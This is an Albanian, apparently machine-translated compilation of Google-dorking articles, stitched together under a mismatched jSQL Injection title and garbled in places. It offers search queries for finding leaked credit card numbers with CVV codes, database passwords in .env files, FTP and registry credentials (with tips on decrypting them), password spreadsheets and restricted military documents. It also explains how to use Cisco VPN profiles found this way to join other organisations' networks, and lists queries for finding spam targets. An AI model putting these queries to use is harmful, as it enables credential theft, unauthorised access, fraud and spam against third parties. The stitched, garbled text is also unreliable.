Udhëzime për përdorimin e jSQL Injection, një mjet shumëfunksional për gjetjen dhe shfrytëzimin e injeksioneve SQL në Kali Linux. Përdorimi i veçorive pak të njohura të Google për të gjetur përdorime të fshehura të Google si një skaner CGI

Marrja e të dhënave private nuk do të thotë gjithmonë hakerim - ndonjëherë ato publikohen në akses publik. Njohuri Cilësimet e Google dhe pak zgjuarsi do t'ju lejojë të gjeni shumë gjëra interesante - nga numrat e kartave të kreditit deri te dokumentet e FBI-së.

PARALAJMËRIM

I gjithë informacioni jepet vetëm për qëllime informative. As redaktorët dhe as autori nuk janë përgjegjës për ndonjë dëm të mundshëm të shkaktuar nga materialet e këtij artikulli.

Çdo gjë është e lidhur me internetin sot, duke u kujdesur pak për kufizimin e aksesit. Prandaj, shumë të dhëna private bëhen pre e motorëve të kërkimit. Robotët Spider nuk janë më të kufizuar në faqet e internetit, por indeksojnë të gjithë përmbajtjen e disponueshme në ueb dhe vazhdimisht shtojnë informacion konfidencial në bazat e të dhënave të tyre. Mësimi i këtyre sekreteve është i lehtë - ju vetëm duhet të dini se si të pyesni për to.

Duke kërkuar për skedarë

Në duar të aftë, Google do të gjejë shpejt gjithçka që është e keqe në ueb, si informacione personale dhe skedarë për përdorim zyrtar. Ato shpesh fshihen si një çelës nën një qilim: nuk ka kufizime reale të aksesit, të dhënat thjesht qëndrojnë në pjesën e pasme të faqes, ku lidhjet nuk çojnë. Ndërfaqja standarde e uebit e Google ofron vetëm cilësimet bazë kërkim i avancuar, por edhe ato do të mjaftojnë.

Ekzistojnë dy operatorë që mund të përdorni për të kufizuar kërkimet e Google në skedarë të një lloji të caktuar: lloji i skedarit dhe ext . E para përcakton formatin që motori i kërkimit përcaktoi nga kreu i skedarit, i dyti - zgjerimi i skedarit, pavarësisht nga përmbajtja e tij e brendshme. Kur kërkoni në të dyja rastet, duhet të specifikoni vetëm shtrirjen. Fillimisht, operatori ext ishte i përshtatshëm për t'u përdorur në rastet kur nuk kishte veçori specifike të formatit për skedarin (për shembull, për të kërkuar skedarë të konfigurimit ini dhe cfg, të cilat mund të përmbajnë çdo gjë). Tani Algoritmet e Google ndryshuar, dhe nuk ka dallim të dukshëm midis operatorëve - rezultatet janë të njëjta në shumicën e rasteve.


Filtrimi i daljes

Si parazgjedhje, Google kërkon për fjalë dhe në përgjithësi për çdo karakter të futur në të gjithë skedarët në faqet e indeksuara. Ju mund të kufizoni shtrirjen e kërkimit nga domeni i nivelit të lartë, një sajt specifik ose nga vendndodhja e sekuencës së dëshiruar në vetë skedarët. Për dy opsionet e para, përdoret deklarata e faqes, e ndjekur nga emri i domenit ose siti i zgjedhur. Në rastin e tretë, një grup i tërë operatorësh ju lejon të kërkoni informacion në fushat e shërbimit dhe metadatat. Për shembull, allinurl do të gjejë të specifikuar në trupin e vetë lidhjeve, allinanchor - në tekstin e dhënë me etiketën , allintitle - në titujt e faqeve, allintext - në trupin e faqeve.

Për çdo operator ka një version më të lehtë me një emër më të shkurtër (pa parashtesën të gjitha). Dallimi është se allinurl do të gjejë lidhje me të gjitha fjalët, ndërsa inurl do të gjejë lidhje vetëm me të parën prej tyre. Fjalët e dyta dhe të mëvonshme nga pyetja mund të shfaqen kudo në faqet e internetit. Operatori inurl gjithashtu ndryshon nga një tjetër i ngjashëm për nga kuptimi - site . E para gjithashtu ju lejon të gjeni çdo sekuencë karakteresh në lidhjen me dokumentin e dëshiruar (për shembull, /cgi-bin/), i cili përdoret gjerësisht për të gjetur komponentë me dobësi të njohura.

Le ta provojmë në praktikë. Ne marrim filtrin allintext dhe bëjmë që pyetja të kthejë një listë me numrat e kartave të kreditit dhe kodet e verifikimit, të cilat do të skadojnë vetëm pas dy vjetësh (ose kur pronarët e tyre të lodhen duke ushqyer të gjithë me radhë).

Allintext: data e skadimit të numrit të kartës /2017 cvv

Kur lexon në lajme se një haker i ri "hakoi në serverët" e Pentagonit ose NASA-s, duke vjedhur informacione të klasifikuara, atëherë në shumicën e rasteve është pikërisht kjo teknikë elementare e përdorimit të Google. Supozoni se jemi të interesuar për një listë të punonjësve të NASA-s dhe detajet e kontaktit të tyre. Sigurisht që një listë e tillë është në formë elektronike. Për lehtësi ose për shkak të një mosrespektimi, ai gjithashtu mund të shtrihet në faqen e internetit të vetë organizatës. Është logjike që në këtë rast nuk do të ketë referenca për të, pasi është menduar për përdorim të brendshëm. Cilat fjalë mund të jenë në një skedar të tillë? Të paktën - fusha "adresa". Është e lehtë të testohen të gjitha këto supozime.


inurl:nasa.gov lloji i skedarit:xlsx "adresa"


Ne përdorim burokracinë

Gjetje të tilla janë një gjë e vogël e këndshme. Kapja vërtet e fortë vjen nga një njohuri më e detajuar e Operatorëve të Uebmasterit të Google, vetë Uebit dhe strukturës së asaj që po kërkoni. Duke ditur detajet, mund të filtroni lehtësisht daljen dhe të përsosni vetitë e skedarëve që ju nevojiten në mënyrë që të merrni të dhëna vërtet të vlefshme në pjesën tjetër. Është për të qeshur që burokracia vjen në shpëtim këtu. Ai prodhon formulime tipike që e bëjnë të përshtatshëm kërkimin e informacionit sekret që ka rrjedhur aksidentalisht në ueb.

Për shembull, vula e deklaratës së shpërndarjes, e cila është e detyrueshme në zyrën e Departamentit të Mbrojtjes të SHBA-së, nënkupton kufizime të standardizuara në shpërndarjen e një dokumenti. Shkronja A shënon publikimet publike në të cilat nuk ka asgjë sekrete; B - i destinuar vetëm për përdorim të brendshëm, C - rreptësisht konfidencial, e kështu me radhë deri në F. Më vete, ekziston shkronja X, e cila shënon informacione veçanërisht të vlefshme që përfaqësojnë një sekret shtetëror të nivelit më të lartë. Le të kërkojnë dokumente të tilla ata që supozohet ta bëjnë në detyrë dhe ne do të kufizohemi në dosjet me shkronjën C. Sipas DoDI 5230.24, një shënim i tillë u caktohet dokumenteve që përmbajnë një përshkrim të teknologjive kritike që bien nën kontrollin e eksportit. Ju mund të gjeni informacione të tilla të ruajtura me kujdes në sajtet në domenin e nivelit të lartë .mil të caktuar për ushtrinë amerikane.

"DEKLARATA E SHPËRNDARJES C" inurl:navy.mil

Është shumë e përshtatshme që vetëm faqet nga Departamenti i Mbrojtjes i SHBA-së dhe organizatat e tij kontraktuese të mblidhen në domenin .mil. Rezultatet e kërkimit të kufizuara në domen janë jashtëzakonisht të pastra dhe titujt flasin vetë. Është praktikisht e kotë të kërkosh sekretet ruse në këtë mënyrë: kaos mbretëron në domenet .ru dhe .rf, dhe emrat e shumë sistemeve të armëve tingëllojnë si botanik (PP "Kiparis", armë vetëlëvizëse "Acacia") apo edhe përrallore (TOS "Pinocchio").


Duke ekzaminuar me kujdes çdo dokument nga një sajt në domenin .mil, mund të shihni shënues të tjerë për të rafinuar kërkimin tuaj. Për shembull, një referencë për kufizimet e eksportit "Sec 2751", e cila është gjithashtu e përshtatshme për të kërkuar informacione teknike interesante. Herë pas here, ai hiqet nga faqet zyrtare, ku është shfaqur dikur, kështu që nëse nuk mund të ndiqni një lidhje interesante në rezultatet e kërkimit, përdorni cache-in e Google (operatori i memorjes së fshehtë) ose faqen e internetit të Arkivit të Internetit.

Ne ngjitemi në re

Përveç dokumenteve të deklasifikuara aksidentalisht nga departamentet qeveritare, lidhjet me skedarët personalë nga Dropbox dhe shërbime të tjera të ruajtjes së të dhënave që krijojnë lidhje "private" me të dhënat e publikuara publikisht shfaqen herë pas here në memorien e Google. Është edhe më keq me shërbimet alternative dhe të bëra vetë. Për shembull, pyetja e mëposhtme gjen të dhënat e të gjithë klientëve të Verizon që kanë të instaluar një server FTP dhe përdorin në mënyrë aktive një ruter në ruterin e tyre.

Allinurl:ftp://verizon.net

Tani ka më shumë se dyzet mijë njerëz të tillë të zgjuar, dhe në pranverën e 2015 kishte një renditje të përmasave më shumë. Në vend të Verizon.net, mund të zëvendësoni emrin e çdo ofruesi të mirënjohur, dhe sa më i famshëm të jetë, aq më i madh mund të jetë kapja. Nëpërmjet serverit të integruar FTP, mund të shihni skedarë në një disk të jashtëm të lidhur me ruterin. Zakonisht ky është një NAS për punë në distancë, një re personale ose një lloj shkarkimi skedari peer-to-peer. E gjithë përmbajtja e mediave të tilla indeksohet nga Google dhe motorë të tjerë kërkimi, kështu që ju mund të përdorni skedarët e ruajtur në disqet e jashtme nëpërmjet një lidhjeje të drejtpërdrejtë.

Duke parë konfigurimet

Përpara migrimit me shumicë në retë, serverët e thjeshtë FTP, të cilëve gjithashtu u mungonin dobësitë, sundonin si depo të largëta. Shumë prej tyre janë ende të rëndësishme sot. Për shembull, programi i njohur WS_FTP Professional ruan të dhënat e konfigurimit, llogaritë e përdoruesve dhe fjalëkalimet në skedarin ws_ftp.ini. Është e lehtë për t'u gjetur dhe lexuar sepse të gjitha hyrjet ruhen në tekst të thjeshtë dhe fjalëkalimet janë të koduara duke përdorur algoritmin Triple DES pas errësimit minimal. Në shumicën e versioneve, thjesht heqja e bajtit të parë është e mjaftueshme.

Deshifrimi i fjalëkalimeve të tilla është i lehtë duke përdorur mjetin WS_FTP Password Decryptor ose një shërbim falas në internet.

Kur flasim për hakimin e një siti arbitrar, ata zakonisht nënkuptojnë marrjen e një fjalëkalimi nga regjistrat dhe kopjet rezervë të skedarëve të konfigurimit të aplikacionit CMS ose të tregtisë elektronike. Nëse e dini strukturën e tyre tipike, mund ta tregoni lehtësisht fjalë kyçe. Linjat si ato që gjenden në ws_ftp.ini janë jashtëzakonisht të zakonshme. Për shembull, Drupal dhe PrestaShop kanë gjithmonë një ID të përdoruesit (UID) dhe një fjalëkalim përkatës (pwd), dhe të gjitha informacionet ruhen në skedarë me shtesën .inc. Ju mund t'i kërkoni ato si kjo:

"pwd=" "UID=" ext:inc

Ne zbulojmë fjalëkalime nga DBMS

Në skedarët e konfigurimit të serverëve SQL, emrat dhe adresat Email përdoruesit ruhen në tekst të qartë dhe haset e tyre MD5 shkruhen në vend të fjalëkalimeve. Deshifrimi i tyre, në mënyrë rigoroze, është i pamundur, por mund të gjesh një përputhje midis çifteve të njohura të hash-fjalëkalimeve.

Deri më tani, ka DBMS që nuk përdorin as hashimin e fjalëkalimeve. Skedarët e konfigurimit të secilit prej tyre thjesht mund të shikohen në shfletues.

Inteksti:DB_PASSWORD lloji i skedarit: env

Me ardhjen e serverëve Windows, vendi i skedarëve të konfigurimit u zu pjesërisht nga regjistri. Ju mund të kërkoni nëpër degët e tij në të njëjtën mënyrë, duke përdorur reg si lloj skedari. Për shembull, si kjo:

Lloji i skedarit:reg HKEY_CURRENT_USER "Fjalëkalimi"=

Mos harroni të dukshmen

Ndonjëherë është e mundur të arrihet tek informacioni i klasifikuar me ndihmën e të dhënave të hapura dhe të kapura aksidentalisht nga Google. Opsioni ideal është të gjeni një listë të fjalëkalimeve në një format të zakonshëm. Ruani informacionin e llogarisë në skedar teksti, Dokument Word ose elektronike Tabela e Excel-it Vetëm njerëzit e dëshpëruar munden, por gjithmonë ka mjaft prej tyre.

Lloji i skedarit:xls inurl:fjalëkalimi

Nga njëra anë, ka shumë mjete për të parandaluar incidente të tilla. Është e nevojshme të specifikoni të drejtat adekuate të aksesit në htaccess, patch CMS, mos përdorni skriptet e majta dhe mbyllni vrima të tjera. Ekziston gjithashtu një skedar me një listë përjashtimesh robots.txt, e cila i ndalon motorët e kërkimit të indeksojnë skedarët dhe drejtoritë e specifikuara në të. Nga ana tjetër, nëse struktura robots.txt në ndonjë server ndryshon nga ajo standarde, atëherë menjëherë bëhet e qartë se çfarë po përpiqen të fshehin në të.

Lista e drejtorive dhe skedarëve në çdo faqe paraprihet nga indeksi standard i mbishkrimit të. Meqenëse duhet të shfaqet në titull për qëllime shërbimi, ka kuptim të kufizohet kërkimi i tij tek operatori i titullit. Gjëra interesante mund të gjenden në drejtoritë /admin/, /personal/, /etc/ madje edhe /secret/.

Ndiqni përditësimet

Rëndësia është jashtëzakonisht e rëndësishme këtu: dobësitë e vjetra mbyllen shumë ngadalë, por Google dhe rezultatet e kërkimit të tij po ndryshojnë vazhdimisht. Madje ka një ndryshim midis filtrit "sekondën e fundit" (&tbs=qdr:s në fund të url-së së kërkesës) dhe filtrit "kohë reale" (&tbs=qdr:1).

Kohëzgjatja e datës përditësimi më i fundit Skedari i Google tregohet gjithashtu në mënyrë implicite. Nëpërmjet ndërfaqes grafike të internetit, ju mund të zgjidhni një nga periudhat tipike (orë, ditë, javë, etj.) ose të vendosni një interval datash, por kjo metodë nuk është e përshtatshme për automatizim.

Nga pamja e shiritit të adresave, mund të merret me mend vetëm një mënyrë për të kufizuar daljen e rezultateve duke përdorur konstruktin &tbs=qdr:. Shkronja y pas saj specifikon një kufi prej një viti (&tbs=qdr:y), m tregon rezultatet për muajin e fundit, w për javën, d për ditën e kaluar, h për orën e fundit, n për minutën, dhe s për më jep një sekondë. Rezultatet më të fundit që sapo i janë bërë të njohura Google gjenden duke përdorur filtrin &tbs=qdr:1.

Nëse keni nevojë të shkruani një skenar të ndërlikuar, do të jetë e dobishme të dini se diapazoni i datave është vendosur në Google në formatin Julian përmes operatorit datarange. Për shembull, kjo është mënyra se si mund të gjeni një listë të dokumenteve PDF me fjalën konfidenciale të ngarkuar midis 1 janarit dhe 1 korrikut 2015.

Lloji i skedarit konfidencial: pdf datarange:2457024-2457205

Diapazoni specifikohet në formatin Julian të datës pa dhjetore. Është e papërshtatshme t'i përktheni ato me dorë nga kalendari Gregorian. Është më e lehtë të përdorësh një konvertues datash.

Synimi dhe filtrimi përsëri

Përveç specifikimit të operatorëve shtesë në pyetjen e kërkimit, ata mund të dërgohen drejtpërdrejt në trupin e lidhjes. Për shembull, tipari filetype:pdf korrespondon me konstruktin as_filetype=pdf. Kështu, është e përshtatshme të vendosni ndonjë sqarim. Le të themi se dalja e rezultateve vetëm nga Republika e Hondurasit vendoset duke shtuar konstruksionin cr=countryHN në URL-në e kërkimit, por vetëm nga qyteti i Bobruisk - gcs=Bobruisk . Shikoni seksionin e zhvilluesve për një listë të plotë të .

Mjetet e automatizimit të Google janë krijuar për ta bërë jetën më të lehtë, por shpesh e shtojnë telashin. Për shembull, qyteti i një përdoruesi përcaktohet nga IP-ja e përdoruesit përmes WHOIS. Bazuar në këtë informacion, Google jo vetëm që balancon ngarkesën midis serverëve, por gjithashtu ndryshon rezultatet e kërkimit. Në varësi të rajonit, për të njëjtën pyetje, rezultate të ndryshme do të arrijnë në faqen e parë dhe disa prej tyre mund të rezultojnë të jenë plotësisht të fshehura. Ndjehuni si një kozmopolit dhe kërkimi i informacionit nga çdo vend do të ndihmojë kodin e tij me dy shkronja pas direktivës gl=country . Për shembull, kodi për Holandën është NL, ndërsa Vatikani dhe Koreja e Veriut nuk kanë kodin e tyre në Google.

Shpesh rezultatet e kërkimit janë të ndotura edhe pas përdorimit të disa filtrave të avancuar. Në këtë rast, është e lehtë të përsoset pyetja duke shtuar disa fjalë përjashtimore në të (secila prej tyre paraprihet nga një shenjë minus). Për shembull, bankat, emrat dhe tutoriali shpesh përdoren me fjalën Personal. Prandaj, rezultatet më të pastra të kërkimit nuk do të tregojnë një shembull teksti shkollor të një pyetjeje, por një të rafinuar:

Titulli:"Indeksi i /Personal/" -emrat -tutorial -bankare

Shembulli i fundit

Një haker i sofistikuar dallohet nga fakti se i siguron vetes gjithçka që i nevojitet vetë. Për shembull, një VPN është një gjë e përshtatshme, por ose e shtrenjtë ose e përkohshme dhe me kufizime. Regjistrimi vetëm për veten tuaj është shumë i shtrenjtë. Është mirë që ka abonime në grup, por me GoogleËshtë e lehtë të jesh pjesë e një grupi. Për ta bërë këtë, thjesht gjeni skedarin e konfigurimit të Cisco VPN, i cili ka një shtrirje PCF mjaft jo standarde dhe një shteg të njohur: Program Files\Cisco Systems\VPN Client\Profiles . Një kërkesë, dhe ju bashkohuni, për shembull, me stafin miqësor të Universitetit të Bonit.

Lloji i skedarit: pcf vpn OSE Grupi

INFO

Google gjen skedarë konfigurimi me fjalëkalime, por shumë prej tyre janë të koduar ose zëvendësuar me hash. Nëse shihni vargje me një gjatësi fikse, atëherë kërkoni menjëherë një shërbim deshifrimi.

Fjalëkalimet ruhen në formë të koduar, por Maurice Massard tashmë ka shkruar një program për t'i deshifruar ato dhe po e ofron atë falas nëpërmjet thecampusgeeks.com.

Me ndihmën e Google kryhen qindra lloje të ndryshme sulmesh dhe teste depërtimi. Ka shumë opsione që prekin programet e njohura, formatet kryesore të bazës së të dhënave, dobësitë e shumta PHP, retë, etj. Njohja e saktë e asaj që po kërkoni e bën shumë më të lehtë marrjen e informacionit që ju nevojitet (veçanërisht informacionin që nuk keni ndërmend ta bëni publike). No Shodan single ushqen ide interesante, por çdo bazë të dhënash të burimeve të rrjetit të indeksuar!

Si të kërkoni duke përdorur google.com

Të gjithë ndoshta e dinë se si të përdorin një motor kërkimi si Google =) Por jo të gjithë e dinë këtë nëse kompozoni saktë pyetje kërkimi me ndihmën e modeleve speciale, ju mund të arrini rezultatet e asaj që kërkoni në mënyrë shumë më efikase dhe shpejt =) Në këtë artikull do të përpiqem të tregoj se çfarë dhe si duhet të bëni për të kërkuar saktë

Google mbështet disa operatorë kërkimi të avancuar që kanë kuptim të veçantë kur kërkoni në google.com. Në mënyrë tipike, këta operatorë modifikojnë kërkimin, ose madje i thonë Google të bëjë kërkime krejtësisht të ndryshme. Për shembull, ndërtimi lidhje:është një operator special, dhe pyetja lidhje: www.google.com nuk do t'ju japë një kërkim normal, por në vend të kësaj do të gjeni të gjitha faqet e internetit që kanë lidhje me google.com.
llojet alternative të kërkesave

cache: Nëse përfshini fjalë të tjera në pyetje, Google do t'i nënvizojë ato fjalë të përfshira brenda dokumentit të ruajtur.
Për shembull, cache: www.web site do të shfaqë përmbajtjen e ruajtur në memorie me fjalën "web" të theksuar.

lidhje: pyetja e mësipërme e kërkimit do të tregojë faqet e internetit që përmbajnë lidhje me pyetjen e specifikuar.
Për shembull: lidhje: www.website do të shfaqë të gjitha faqet që kanë një lidhje me http://www.site

të lidhura: Shfaq faqet e internetit që janë "të lidhura" me faqen e caktuar të internetit.
Për shembull, të lidhura: www.google.com do të listojë faqet e internetit që janë të ngjashme faqja kryesore Google.

info: Kërko Informacion: do të japë disa informacione që Google ka në lidhje me faqen e kërkuar të internetit.
Për shembull, info: faqe interneti do të tregojë informacion rreth forumit tonë =) (Armada - Forumi i webmasterëve të rritur).

Kërkesa të tjera për informacion

përcaktoni: Pyetja define: do të japë një përkufizim të fjalëve që shkruani pas kësaj, të përpiluar nga burime të ndryshme në internet. Përkufizimi do të jetë për të gjithë frazën e futur (d.m.th., do të përfshijë të gjitha fjalët në pyetjen e saktë).

stoqet: Nëse filloni një pyetje me aksione: Google do t'i trajtojë pjesën tjetër të termave të pyetjes si tregues të aksioneve dhe do të lidhet me një faqe që tregon informacionin e përgatitur për ato karaktere.
Për shembull, stoqet: Intel yahoo do të tregojë informacione rreth Intel dhe Yahoo. (Vini re se duhet të printoni karaktere të lajmeve të fundit, jo emrin e kompanisë)

Kërkesa për modifikues

faqe: Nëse përfshin faqen: në pyetjen tuaj, Google do t'i kufizojë rezultatet në faqet e internetit që gjen në atë domen.
Ju gjithashtu mund të kërkoni për zona individuale, të tilla si ru, org, com, etj ( faqe: com site:ru)

gjithëtitulli: Nëse kryeni një pyetje me allintitle:, Google do të kufizojë rezultatet me të gjitha fjalët e pyetjes në titull.
Për shembull, allintitle: kërkimi në google do të kthejë të gjitha faqet e kërkimit në Google si imazhe, Blog, etj

titulli: Nëse përfshini titullin: në pyetjen tuaj, Google do të kufizojë rezultatet në dokumente që përmbajnë atë fjalë në titull.
Për shembull, titulli: Biznes

allinurl: Nëse kryeni një pyetje me allinurl: Google do të kufizojë rezultatet me të gjitha fjalët e pyetjes në URL.
Për shembull, allinurl: kërkimi në google do t'i kthejë dokumentet me google dhe do të kërkojë në titull. Gjithashtu, si opsion, mund t'i ndani fjalët me një vijë të pjerrët (/), atëherë fjalët në të dy anët e vijës së pjerrët do të kërkohen brenda së njëjtës faqe: Shembull allinurl: foo/bar

inurl: Nëse përfshini inurl: në pyetjen tuaj, Google do t'i kufizojë rezultatet në dokumente që përmbajnë atë fjalë në URL.
Për shembull, Animacion inurl: website

teksti: kërkon vetëm në tekstin e faqes për fjalën e specifikuar, duke injoruar titullin dhe tekstet e lidhjeve, dhe gjëra të tjera që nuk lidhen me. Ekziston edhe një derivat i këtij modifikuesi - allintext: ato. më tej, të gjitha fjalët në pyetje do të kërkohen vetëm në tekst, gjë që është gjithashtu e rëndësishme, duke injoruar fjalët e përdorura shpesh në lidhje
Për shembull, teksti:forum

intervali i datës: kërkimet në korniza kohore (daterange:2452389-2452389), datat për kohën janë të specifikuara në formatin Julian.

Epo, dhe të gjitha llojet e shembujve interesantë të kërkesave

Shembuj të përpilimit të pyetjeve për Google. Për spammers

inurl:control.guest?a=shenjë

Site:books.dreambook.com "URL i faqes kryesore" "Sign my" inurl:sign

Faqja: www.freegb.net Faqja kryesore

Inurl:sign.asp "Numri i Karaktereve"

"Mesazhi:" inurl:sign.cfm "Dërguesi:"

inurl:register.php "Regjistrimi i përdoruesit" "Uebfaqja"

Inurl:edu/libri i të ftuarve "Nënshkruani librin e të ftuarve"

Inurl:post "Post koment" "URL"

Inurl:/archives/ "Komente:" "E mbani mend informacionin?"

“Script dhe Guestbook Krijuar nga:” “URL:” “Komente:”

inurl:?action=add "phpBook" "URL"

Titulli: "Dorëzo histori të re"

Revista

inurl:www.livejournal.com/users/mode=reply

inurl greatestjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

inurl:fastbb.ru /re.pl? "Libri i mysafirëve"

Blogjet

Inurl:blogger.com/comment.g?”postID””anonim”

Inurl:typepad.com/ "Postoni një koment" "Të mbani mend informacionin personal?"

Inurl:greatestjournal.com/community/ “Posto koment” “adresat e posterave anonimë”

"Posto koment" "adresat e posterave anonimë" -

Titulli: "Posto koment"

Inurl:pirillo.com "Post koment"

Forumet

Inurl:gate.html?”name=Forume” “mode=reply”

inurl:"forum/posting.php?mode=reply"

inurl:"mes.php?"

inurl:"members.html"

inurl:forum/memberlist.php?”

Hakerimi me Google

Aleksandër Antipov

Sistemi i kërkimit Google (www.google.com) ofron shumë opsione kërkimi. Të gjitha këto veçori janë një mjet i paçmuar kërkimi për një përdorues interneti për herë të parë dhe në të njëjtën kohë një armë edhe më e fuqishme pushtimi dhe shkatërrimi në duart e njerëzve me qëllime të liga, duke përfshirë jo vetëm hakerët, por edhe kriminelët jo kompjuterikë. madje edhe terroristë.
(9475 shikime në 1 javë)


Denis Batrankov
denisNOSPAMixi.ru

Kujdes:Ky artikull nuk është një udhëzues për veprim. Ky artikull është shkruar për ju, administratorë të serverëve WEB, në mënyrë që të humbni ndjenjën e rreme se jeni të sigurt dhe më në fund të kuptoni tinëzarin e kësaj metode të marrjes së informacionit dhe të vendosni për mbrojtjen e faqes tuaj.

Prezantimi

Për shembull, kam gjetur 1670 faqe në 0,14 sekonda!

2. Le të vendosim një rresht tjetër, për shembull:

inurl:"auth_user_file.txt"

pak më pak, por kjo tashmë është e mjaftueshme për shkarkim falas dhe për të gjetur fjalëkalime (duke përdorur të njëjtin John The Ripper). Më poshtë do të jap disa shembuj të tjerë.

Pra, ju duhet të kuptoni se motori i kërkimit Google ka vizituar shumicën e faqeve të internetit dhe ka ruajtur informacionin e përfshirë në to. Ky informacion i ruajtur në memorie ju lejon të merrni informacione rreth sajtit dhe përmbajtjes së sajtit pa një lidhje të drejtpërdrejtë me sitin, thjesht duke gërmuar në informacionin që ruhet brenda nga Google. Për më tepër, nëse informacioni në sit nuk është më i disponueshëm, atëherë informacioni në cache mund të ruhet akoma. Gjithçka që duhet për këtë metodë është të njohësh disa fjalë kyçe të Google. Kjo teknikë quhet Google Hacking.

Për herë të parë, informacioni rreth Google Hacking u shfaq në listën e postimeve të Bugtruck 3 vjet më parë. Në vitin 2001, kjo temë u ngrit nga një student francez. Këtu është një lidhje për këtë letër http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Ai jep shembujt e parë të kërkesave të tilla:

1) Indeksi i /admin
2) Indeksi i /fjalëkalimit
3) Indeksi i /mail
4) Indeksi i / +banques +tipi i skedarit:xls (për Francën...)
5) Indeksi i / +passwd
6) Indeksi i/fjalëkalimit.txt

Kjo temë bëri shumë zhurmë në pjesën e internetit të leximit në anglisht kohët e fundit: pas një artikulli të Johnny Long të botuar më 7 maj 2004. Për një studim më të plotë të Google Hacking, ju këshilloj të shkoni në faqen e këtij autori http://johnny.ihackstuff.com. Në këtë artikull, unë thjesht dua t'ju bëj të përditësuar.

Kush mund ta përdorë atë:
- Gazetarët, spiunët dhe të gjithë ata njerëz që duan të fusin hundën në punët e të tjerëve mund ta përdorin këtë për të kërkuar prova komprometuese.
- Hakerët që kërkojnë objektiva të përshtatshëm për hakerim.

Si funksionon Google.

Për të vazhduar bisedën, më lejoni t'ju kujtoj disa nga fjalët kyçe të përdorura në pyetjet e Google.

Kërkoni duke përdorur shenjën +

Google përjashton, sipas mendimit të tij, fjalë të parëndësishme nga kërkimi. Për shembull, fjalët pyetëse, parafjalët dhe artikujt në gjuhe angleze: për shembull janë, nga, ku. Në rusisht, Google duket se i konsideron të gjitha fjalët të rëndësishme. Nëse fjala përjashtohet nga kërkimi, atëherë Google shkruan për të. Në mënyrë që Google të fillojë të kërkojë faqe me këto fjalë, duhet të shtoni një shenjë + përpara tyre pa një hapësirë ​​para fjalës. Për shembull:

ace + e bazës

Kërko sipas shenjës -

Nëse Google e gjen nje numer i madh i faqet nga të cilat dëshironi të përjashtoni faqet me tema të caktuara, mund ta detyroni Google të kërkojë vetëm faqe që nuk përmbajnë fjalë të caktuara. Për ta bërë këtë, duhet t'i tregoni këto fjalë duke vendosur një shenjë përpara secilës - pa një hapësirë ​​para fjalës. Për shembull:

peshkimi - vodka

Kërko me shenjën ~

Ju mund të dëshironi të kërkoni jo vetëm fjalën e specifikuar, por edhe sinonimet e saj. Për ta bërë këtë, paraprini fjalën me simbolin ~.

Gjetja e një fraze të saktë duke përdorur thonjëza të dyfishta

Google kërkon në secilën faqe për të gjitha dukuritë e fjalëve që keni shkruar në vargun e pyetjes, dhe nuk i intereson pozicioni relativ i fjalëve, gjëja kryesore është që të gjitha fjalët e specifikuara të jenë në faqe në të njëjtën kohë ( ky është veprimi i paracaktuar). Per te gjetur frazë e saktë- duhet të vendoset në thonjëza. Për shembull:

"ende libri"

Për të pasur të paktën një nga fjalët e specifikuara, duhet të specifikoni operacion logjik në mënyrë eksplicite: OSE. Për shembull:

siguria e librit OSE mbrojtja

Përveç kësaj, ju mund të përdorni shenjën * në vargun e kërkimit për të treguar çdo fjalë dhe. për të përfaqësuar çdo personazh.

Gjetja e fjalëve me operatorë shtesë

Ka operatorë kërkimi që janë specifikuar në vargun e kërkimit në formatin:

operatori: term_kërkimi

Hapësirat pranë zorrës së trashë nuk janë të nevojshme. Nëse futni një hapësirë ​​​​pas një dy pika, do të shihni një mesazh gabimi dhe para tij, Google do t'i përdorë ato si një varg normal kërkimi.
Ekzistojnë grupe të operatorëve shtesë të kërkimit: gjuhët - tregoni në cilën gjuhë dëshironi të shihni rezultatin, datën - kufizoni rezultatet për tre, gjashtë ose 12 muajt e fundit, dukuritë - tregoni se ku në dokument duhet të kërkoni vargu: kudo, në titull, në URL, domenet - kërkoni për sitin e specifikuar ose anasjelltas përjashtoni atë nga kërkimi, Kerkim i sigurte- bllokoni faqet që përmbajnë llojin e specifikuar të informacionit dhe hiqni ato nga faqet e rezultateve të kërkimit.
Sidoqoftë, disa operatorë nuk kanë nevojë për një parametër shtesë, për shembull, pyetja " cache: www.google.com"mund të quhet si një varg i plotë kërkimi, dhe disa fjalë kyçe, përkundrazi, kërkojnë një fjalë kërkimi, për shembull " faqja: www.google.com ndihmë Në dritën e temës sonë, le të shohim deklaratat e mëposhtme:

Operatori

Përshkrim

Kërkon një parametër shtesë?

kërkoni vetëm për faqen e specifikuar në search_term

kërkoni vetëm në dokumente me llojin search_term

gjeni faqet që përmbajnë termin e kërkimit në titull

gjeni faqet që përmbajnë të gjitha fjalët search_term në titull

gjeni faqet që përmbajnë fjalën search_term në adresën e tyre

gjeni faqe që përmbajnë të gjitha fjalët search_term në adresën e tyre

Operatori faqe: kufizon kërkimin vetëm në sitin e specifikuar, dhe ju mund të specifikoni jo vetëm Emri i domenit por edhe adresën IP. Për shembull, futni:

Operatori lloji i skedarit: kufizon kërkimet në skedarë të një lloji të caktuar. Për shembull:

Që nga data e këtij artikulli, Google mund të kërkojë në 13 formate të ndryshme skedarësh:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus Word Pro (lwp)
  • MacWrite (mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word(doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Formati i tekstit të pasur (rtf)
  • Shockwave Flash (swf)
  • Teksti (përgjigje, txt)

Operatori lidhje: tregon të gjitha faqet që tregojnë në faqen e specifikuar.
Duhet të jetë gjithmonë interesante të shohësh se sa vende në internet dinë për ju. Ne përpiqemi:

Operatori cache: tregon versionin e ruajtur në memorien e Google të sajtit siç dukej kur google e fundit vizitoi këtë faqe një herë. Ne marrim çdo faqe që ndryshon shpesh dhe shikojmë:

Operatori titulli: kërkon fjalën e specifikuar në titullin e faqes. Operatori gjithëtitulli:është një shtesë - kërkon të gjitha pak fjalët e specifikuara në titullin e faqes. Krahaso:

titulli: fluturim në mars
intitle:fluturim intitle:në intitle:mars
allintitle:fluturim në mars

Operatori inurl: bën që Google të shfaqë të gjitha faqet që përmbajnë vargun e specifikuar në URL. allinurl: kërkon të gjitha fjalët në një URL. Për shembull:

allinurl:acid_stat_alerts.php

